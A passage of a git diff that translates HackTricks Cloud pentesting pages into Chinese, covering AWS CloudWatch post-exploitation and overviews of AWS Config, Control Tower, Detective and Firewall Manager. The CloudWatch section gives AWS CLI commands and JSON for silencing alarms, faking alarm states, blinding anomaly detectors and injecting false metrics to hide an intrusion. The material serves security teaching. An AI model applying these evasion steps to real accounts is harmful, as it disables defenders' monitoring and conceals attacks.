+"Name": "InstanceId", +"Value": "i-0645d6d414dadf9f8" +} +], +"AlarmActions": [], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 8640, +"EvaluationPeriods": 8640, +"Period": 10, +"Statistic": "Average", +"Threshold": 99, +"AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", +"AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**潜在影响**:缺乏对关键事件的通知,可能存在未被发现的问题,虚假警报,抑制真实警报,可能错过对真实事件的检测。 ### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`** -By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response. +通过删除警报操作,攻击者可以防止在达到警报状态时触发关键警报和自动响应,例如通知管理员或触发自动扩展活动。不当启用或重新启用警报操作也可能导致意外行为,可能通过重新激活先前禁用的操作或修改触发的操作,导致事件响应中的混淆和误导。 -In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. - -- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. +此外,拥有权限的攻击者可以操纵警报状态,能够创建虚假警报以分散和混淆管理员,或使真实警报静音以掩盖正在进行的恶意活动或关键系统故障。 +- 如果您在复合警报上使用 **`SetAlarmState`**,则复合警报不保证返回其实际状态。只有在其子警报状态发生变化时,它才会返回其实际状态。如果您更新其配置,它也会被重新评估。 ```bash aws cloudwatch disable-alarm-actions --alarm-names aws cloudwatch enable-alarm-actions --alarm-names aws cloudwatch set-alarm-state --alarm-name --state-value --state-reason [--state-reason-data ] ``` - -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**潜在影响**:缺乏对关键事件的通知,可能未被检测到的问题,虚假警报,抑制真实警报,可能错过对真实事件的检测。 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`** -An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring. - +攻击者将能够破坏检测和响应指标数据中异常模式或异常的能力。通过删除现有的异常检测器,攻击者可以禁用关键的警报机制;通过创建或修改它们,攻击者将能够错误配置或制造虚假警报,以分散或压倒监控。 ```bash aws cloudwatch delete-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat ] aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat --configuration --metric-characteristics ] ``` - -The following example shows how to make a metric anomaly detector ineffective. 
This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period. +以下示例展示了如何使指标异常检测器失效。该指标异常检测器监控特定 EC2 实例的平均 CPU 利用率,只需添加“ExcludedTimeRanges”参数和所需的时间范围,就足以确保异常检测器在该期间内不分析或警报任何相关数据。 {{#tabs }} {{#tab name="Original Metric Anomaly Detector" }} - ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +} } ``` - {{#endtab }} -{{#tab name="Modified Metric Anomaly Detector" }} - +{{#tab name="修改后的指标异常检测器" }} ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - }, - "Configuration": { - "ExcludedTimeRanges": [ - { - "StartTime": "2023-01-01T00:00:00Z", - "EndTime": "2053-01-01T23:59:59Z" - } - ], - "Timezone": "Europe/Madrid" - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +}, +"Configuration": { +"ExcludedTimeRanges": [ +{ +"StartTime": "2023-01-01T00:00:00Z", +"EndTime": "2053-01-01T23:59:59Z" +} +], +"Timezone": "Europe/Madrid" +} } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Direct effect in the detection of unusual patterns or security threats. +**潜在影响**:直接影响检测异常模式或安全威胁。 ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`** -An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities. - +攻击者可以通过创建、修改或删除仪表板来破坏组织的监控和可视化能力。这些权限可以被利用来移除对系统性能和健康的关键可见性,修改仪表板以显示不正确的数据或隐藏恶意活动。 ```bash aws cloudwatch delete-dashboards --dashboard-names aws cloudwatch put-dashboard --dashboard-name --dashboard-body ``` - -**Potential Impact**: Loss of monitoring visibility and misleading information. +**潜在影响**:失去监控可见性和误导性信息。 ### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`** -Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team. 
- +Insight 规则用于检测异常、优化性能和有效管理资源。通过删除现有的 insight 规则,攻击者可以移除关键的监控能力,使系统对性能问题和安全威胁失去感知。此外,攻击者可以创建或修改 insight 规则,以生成误导性数据或隐藏恶意活动,从而导致错误的诊断和运营团队的不当响应。 ```bash aws cloudwatch delete-insight-rules --rule-names aws cloudwatch put-insight-rule --rule-name --rule-definition [--rule-state ] aws cloudwatch put-managed-insight-rules --managed-rules ``` - -**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures. +**潜在影响**:难以检测和响应性能问题和异常,错误的信息决策,可能掩盖恶意活动或系统故障。 ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`** -By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity. - +通过禁用关键的洞察规则,攻击者可以有效地使组织对关键性能和安全指标失去警觉。相反,通过启用或配置误导性规则,可能会生成虚假数据,制造噪音,或掩盖恶意活动。 ```bash aws cloudwatch disable-insight-rules --rule-names aws cloudwatch enable-insight-rules --rule-names ``` - -**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts. +**潜在影响**:操作团队之间的混淆,导致对实际问题的响应延迟以及基于错误警报的不必要行动。 ### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`** -An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: +拥有 **`cloudwatch:DeleteMetricStream`** 和 **`cloudwatch:PutMetricStream`** 权限的攻击者将能够创建和删除指标数据流,从而危及安全性、监控和数据完整性: -- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. -- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. -- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. - -Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. +- **创建恶意流**:创建指标流以将敏感数据发送到未经授权的目的地。 +- **资源操控**:创建过多数据的新指标流可能会产生大量噪音,导致错误警报,掩盖真实问题。 +- **监控中断**:删除指标流,攻击者将中断监控数据的持续流动。这样,他们的恶意活动将有效隐藏。 +同样,拥有 **`cloudwatch:PutMetricData`** 权限,可以向指标流添加数据。这可能导致由于添加了大量不当数据而造成的拒绝服务,使其完全无用。 ```bash aws cloudwatch delete-metric-stream --name aws cloudwatch put-metric-stream --name [--include-filters ] [--exclude-filters ] --firehose-arn --role-arn --output-format aws cloudwatch put-metric-data --namespace [--metric-data ] [--metric-name ] [--timestamp ] [--unit ] [--value ] [--dimensions ] ``` - -Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance: - +在给定的 EC2 实例上添加与 70% CPU 利用率相对应的数据的示例: ```bash aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg" ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams. 
+**潜在影响**:监控数据流的中断,影响异常和事件的检测,资源操控以及由于创建过多的指标流而导致的成本增加。 ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`** -An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams. - +攻击者将控制受影响的指标数据流的流动(如果没有资源限制,则每个数据流)。通过权限 **`cloudwatch:StopMetricStreams`**,攻击者可以通过停止关键指标流来隐藏他们的恶意活动。 ```bash aws cloudwatch stop-metric-streams --names aws cloudwatch start-metric-streams --names ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents. +**潜在影响**:监控数据流的中断,影响异常和事件的检测。 ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`** -An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags. - +攻击者将能够添加、修改或删除CloudWatch资源的标签(目前仅限于警报和贡献者洞察规则)。这可能会破坏您组织基于标签的访问控制策略。 ```bash aws cloudwatch tag-resource --resource-arn --tags aws cloudwatch untag-resource --resource-arn --tag-keys ``` +**潜在影响**:中断基于标签的访问控制策略。 -**Potential Impact**: Disruption of tag-based access control policies. - -## References +## 参考文献 - [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) - [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md index f2ab3c4c5..e6b59397c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md @@ -4,47 +4,43 @@ ## AWS Config -AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**. +AWS Config **捕获资源变化**,因此任何由 Config 支持的资源的变化都可以被记录,这将 **记录变化的内容以及其他有用的元数据,所有这些都保存在一个称为配置项的文件中**,即 CI。该服务是 **区域特定的**。 -A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. 
+配置项或 **CI**,是 AWS Config 的一个关键组成部分。它由一个 JSON 文件组成,**包含配置信息、关系信息和其他元数据,作为受支持资源的时间点快照视图**。AWS Config 可以为资源记录的所有信息都包含在 CI 中。每当受支持的资源的配置以任何方式发生变化时,都会创建一个 CI。除了记录受影响资源的详细信息外,AWS Config 还会记录任何直接相关资源的 CI,以确保变化没有影响到这些资源。 -- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. +- **元数据**:包含有关配置项本身的详细信息。版本 ID 和配置 ID,唯一标识 CI。其他信息可以包括一个 MD5Hash,允许您将已记录的其他 CI 与同一资源进行比较。 +- **属性**:这包含与实际资源相关的常见 **属性信息**。在此部分中,我们还具有唯一的资源 ID,以及与资源相关的任何关键值标签。资源类型也会列出。例如,如果这是一个 EC2 实例的 CI,列出的资源类型可能是网络接口或该 EC2 实例的弹性 IP 地址。 +- **关系**:这包含资源可能具有的任何连接 **关系的信息**。因此,在此部分中,它将清楚地描述该资源与其他资源之间的任何关系。例如,如果 CI 是针对 EC2 实例的,关系部分可能会显示与 VPC 的连接以及 EC2 实例所在的子网。 +- **当前配置**:这将显示如果您执行 AWS CLI 的描述或列出 API 调用时生成的相同信息。AWS Config 使用相同的 API 调用来获取相同的信息。 +- **相关事件**:这与 AWS CloudTrail 相关。这将显示 **与触发此 CI 创建的变化相关的 AWS CloudTrail 事件 ID**。每次对资源进行更改时,都会创建一个新的 CI。因此,将创建不同的 CloudTrail 事件 ID。 -**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. +**配置历史**:得益于配置项,可以获取资源的配置历史。配置历史每 6 小时交付一次,包含特定资源类型的所有 CI。 -**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. +**配置流**:配置项被发送到 SNS 主题,以便对数据进行分析。 -**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. +**配置快照**:配置项用于创建所有受支持资源的时间点快照。 -**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. 
+**S3 用于存储** 配置历史文件和您数据的任何配置快照,所有这些都在一个单一的存储桶中,该存储桶在配置记录器中定义。如果您有多个 AWS 账户,您可能希望将配置历史文件聚合到主账户的同一个 S3 存储桶中。但是,您需要为此服务原则 config.amazonaws.com 授予写入访问权限,并为您的次要账户授予对主账户 S3 存储桶的写入访问权限。 -### Functioning +### 功能 -- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config -- Stores everything in S3 bucket -- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings -- Lambda feeds back to Config -- If rule has been broken, Config fires up an SNS +- 当进行更改时,例如对安全组或存储桶访问控制列表进行更改 —> 触发 AWS Config 捕获的事件 +- 将所有内容存储在 S3 存储桶中 +- 根据设置,一旦发生变化,可能会触发一个 lambda 函数,或定期调度 lambda 函数查看 AWS Config 设置 +- Lambda 将反馈给 Config +- 如果规则被违反,Config 会触发 SNS ![](<../../../../images/image (126).png>) -### Config Rules +### Config 规则 -Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ -AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. +Config 规则是帮助您 **在资源之间强制特定合规检查** **和控制的好方法**,并允许您为每种资源类型采用理想的部署规范。每个规则 **本质上是一个 lambda 函数**,在调用时评估资源并执行一些简单逻辑以确定与规则的合规结果。**每次对您的受支持资源进行更改时,AWS Config 将检查与您已设置的任何配置规则的合规性**。\ +AWS 有许多 **预定义规则**,属于安全范围,随时可用。例如,Rds-storage-encrypted。此规则检查您的 RDS 数据库实例是否启用了存储加密。Encrypted-volumes。此规则检查是否有任何附加状态的 EBS 卷被加密。 -- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -- **Custom rules**: You can create your own rules to check specific customconfigurations. +- **AWS 管理规则**:一组预定义规则,涵盖许多最佳实践,因此在设置自己的规则之前,浏览这些规则总是值得的,因为规则可能已经存在。 +- **自定义规则**:您可以创建自己的规则以检查特定的自定义配置。 -Limit of 50 config rules per region before you need to contact AWS for an increase.\ -Non compliant results are NOT deleted. +每个区域限制 50 个配置规则,之后您需要联系 AWS 以增加配额。\ +不合规的结果不会被删除。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md index 9fab39fb8..0cdeb76b4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md @@ -5,42 +5,36 @@ ## Control Tower > [!NOTE] -> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them. 
+> 总之,Control Tower 是一个允许您为组织内所有账户定义策略的服务。因此,您可以从 Control Tower 设置策略,而不是管理每一个账户,这些策略将应用于它们。 -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. +AWS Control Tower 是 **由亚马逊网络服务(AWS)提供的服务**,使组织能够在 AWS 中设置和管理一个安全、合规的多账户环境。 -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. +AWS Control Tower 提供了一套 **预定义的最佳实践蓝图**,可以根据特定的 **组织需求** 进行定制。这些蓝图包括预配置的 AWS 服务和功能,如 AWS 单点登录(SSO)、AWS Config、AWS CloudTrail 和 AWS 服务目录。 -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. +通过 AWS Control Tower,管理员可以快速设置一个 **满足组织需求的多账户环境**,例如 **安全性** 和合规性。该服务提供一个中央仪表板,以查看和管理账户和资源,并自动化账户、服务和政策的配置。 -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. +此外,AWS Control Tower 提供了保护措施,这是一组预配置的政策,确保环境保持符合组织要求。这些政策可以根据特定需求进行定制。 -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. +总体而言,AWS Control Tower 简化了在 AWS 中设置和管理安全、合规的多账户环境的过程,使组织更容易专注于其核心业务目标。 ### Enumeration -For enumerating controltower controls, you first need to **have enumerated the org**: +要枚举 controltower 控制,您首先需要 **枚举组织**: {{#ref}} ../aws-organizations-enum.md {{#endref}} - ```bash # Get controls applied in an account aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ ``` - > [!WARNING] -> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts +> Control Tower 还可以使用 **Account factory** 在 **账户中执行** **CloudFormation 模板** 并在这些账户中运行服务(提权,后期利用...) -### Post Exploitation & Persistence +### 后期利用与持久性 {{#ref}} ../../aws-post-exploitation/aws-control-tower-post-exploitation.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md index 2f967331b..31085b813 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -2,18 +2,14 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Cost Explorer and Anomaly detection +## 成本探测器和异常检测 -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. 
+这使您能够检查 **您在 AWS 服务上的支出情况** 并帮助您 **检测异常**。\ +此外,您可以配置异常检测,以便 AWS 在发现 **成本异常** 时警告您。 -### Budgets +### 预算 -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). +预算有助于 **管理成本和使用情况**。您可以在 **达到阈值时收到警报**。\ +此外,它们还可以用于与成本无关的监控,例如服务的使用情况(特定 S3 存储桶中使用了多少 GB?)。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md index 9d1a40eba..2d6783027 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -4,9 +4,9 @@ ## Detective -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. +**亚马逊侦探** 简化了安全调查过程,使 **分析、调查和确定** 安全问题或异常活动的根本原因变得更加高效。它自动收集来自 AWS 资源的日志数据,并利用 **机器学习、统计分析和图论** 构建一个互联的数据集。这种设置大大提高了安全调查的速度和有效性。 -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. +该服务简化了对安全事件的深入探索,使安全团队能够迅速理解和解决问题的根本原因。亚马逊侦探分析来自 VPC 流日志、AWS CloudTrail 和亚马逊 GuardDuty 等来源的大量数据。它自动生成 **资源、用户及其随时间的交互的全面互动视图**。这种集成视角提供了所有必要的细节和上下文,使团队能够辨别安全发现背后的原因,检查相关的历史活动,并快速确定根本原因。 ## References @@ -14,7 +14,3 @@ The service eases in-depth exploration of security incidents, allowing security - [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index 0369f075c..c51922cac 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -4,80 +4,79 @@ ## Firewall Manager -**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. 
It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. +**AWS Firewall Manager** 简化了 **AWS WAF、AWS Shield Advanced、Amazon VPC 安全组和网络访问控制列表 (ACL)、AWS 网络防火墙、AWS Route 53 解析器 DNS 防火墙和第三方防火墙** 在多个账户和资源中的管理和维护。它使您能够仅配置一次防火墙规则、Shield Advanced 保护、VPC 安全组和网络防火墙设置,服务 **会自动在您的账户和资源中强制执行这些规则和保护**,包括新添加的资源。 -The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. +该服务提供了 **将特定资源分组和保护在一起** 的能力,例如共享公共标签的资源或您所有的 CloudFront 分发。Firewall Manager 的一个显著优势是其能够 **自动扩展保护到新添加的资源**。 -A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. +一个 **规则组**(WAF 规则的集合)可以被纳入 AWS Firewall Manager 策略中,然后链接到特定的 AWS 资源,如 CloudFront 分发或应用负载均衡器。 -AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: +AWS Firewall Manager 提供 **托管的应用程序和协议列表**,以简化安全组策略的配置和管理。这些列表允许您定义政策允许或拒绝的协议和应用程序。托管列表有两种类型: -- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. -- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. +- **Firewall Manager 托管列表**:这些列表包括 **FMS-Default-Public-Access-Apps-Allowed**、**FMS-Default-Protocols-Allowed** 和 **FMS-Default-Protocols-Allowed**。它们由 Firewall Manager 管理,包含应允许或拒绝公众访问的常用应用程序和协议。无法编辑或删除它们,但您可以选择其版本。 +- **自定义托管列表**:您自己管理这些列表。您可以创建符合您组织需求的自定义应用程序和协议列表。与 Firewall Manager 托管列表不同,这些列表没有版本,但您对自定义列表拥有完全控制权,可以根据需要创建、编辑和删除它们。 -It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. +重要的是要注意,**Firewall Manager 策略仅允许“阻止”或“计数”操作**,没有“允许”选项。 ### Prerequisites -The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment: +在配置 Firewall Manager 以有效保护您组织的资源之前,必须完成以下先决步骤。这些步骤提供了 Firewall Manager 强制执行安全政策和确保合规性所需的基础设置: -1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. 
This allows for centralized management of resources and policies across multiple AWS accounts within the organization. -2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts. -3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management. -4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors. -5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security. -6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures 